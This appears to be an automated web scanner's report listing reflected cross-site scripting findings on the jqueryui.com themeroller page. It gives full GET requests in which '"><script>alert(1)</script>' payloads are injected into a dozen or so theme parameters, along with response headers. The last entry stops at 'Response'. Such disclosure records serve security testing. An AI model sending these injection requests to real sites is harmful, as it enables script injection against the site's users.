GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b933"><script>alert(1)</script>c75e71b9a99 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68ae"><script>alert(1)</script>8316832d0b1 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f2"><script>alert(1)</script>1ea11700b86 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3cd4"><script>alert(1)</script>c1869e1c15c was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>4cac5b3259f was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3652"><script>alert(1)</script>712a67946a6 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5736"><script>alert(1)</script>7a42dd72740 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:57:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef96f"><script>alert(1)</script>5a4c88ddb1b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4287e"><script>alert(1)</script>b19fe4c69d3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120256
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8c3"><script>alert(1)</script>e7f1ed5ee7 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120253
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c572"><script>alert(1)</script>d20b36ec1c was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 07:58:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120253
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1af"><script>alert(1)</script>073f89d073f was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
